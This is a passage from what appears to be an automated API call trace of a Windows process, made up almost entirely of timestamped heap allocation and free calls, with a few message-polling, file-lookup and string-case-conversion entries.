hHeap=0x1780000) returned 1 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0122.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.325] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0122.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0122.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.325] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.325] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8a7ab0, ftCreationTime.dwHighDateTime=0x1d5ec1b, ftLastAccessTime.dwLowDateTime=0x90f581f0, ftLastAccessTime.dwHighDateTime=0x1d5e446, ftLastWriteTime.dwLowDateTime=0x90f581f0, ftLastWriteTime.dwHighDateTime=0x1d5e446, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="BwLCz.jpg", cAlternateFileName="")) returned 0x41ac700 [0122.325] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0122.326] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.327] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0122.327] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0122.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0122.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.330] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.333] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: 